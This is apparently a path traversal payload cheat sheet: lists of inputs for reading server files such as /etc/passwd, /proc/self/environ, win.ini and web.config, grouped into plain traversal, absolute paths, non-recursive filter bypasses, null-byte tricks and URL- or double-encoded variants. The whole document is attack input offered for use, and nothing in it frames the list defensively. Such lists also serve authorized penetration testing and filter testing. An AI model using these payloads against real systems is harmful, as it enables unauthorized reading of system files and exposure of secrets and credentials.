*** Note: These are basic payloads, try checking others for more crafted ones. ***

//Simple case
../../../../etc/passwd
../../../../windows/win.ini
....//....//etc/passwd
..////..////etc/passwd
..\\..\\..\\..\\windows\\win.ini

//absolute bypass
/etc/passwd
/proc/self/environ
/var/log/auth.log
C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts
C:\inetpub\wwwroot\web.config

//non-recursively
....//....//....//etc/passwd
....//....//etc/passwd
..././..././etc/passwd

../../../etc/passwd%00
../../../etc/passwd%00.png // try diff.extensions 

//encoded
..%252f..%252f..%252fetc/passwd
..%252f..%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%c0%af..%c0%afetc%c0%afpasswd
..%5c..%5c..%5c..%5cwindows%5cwin.ini
..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/
..%2f..%2f..%2f..%2fetc%2fpasswd
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd

## Some Path Traversals may need valid start path so don't start with ../ ##
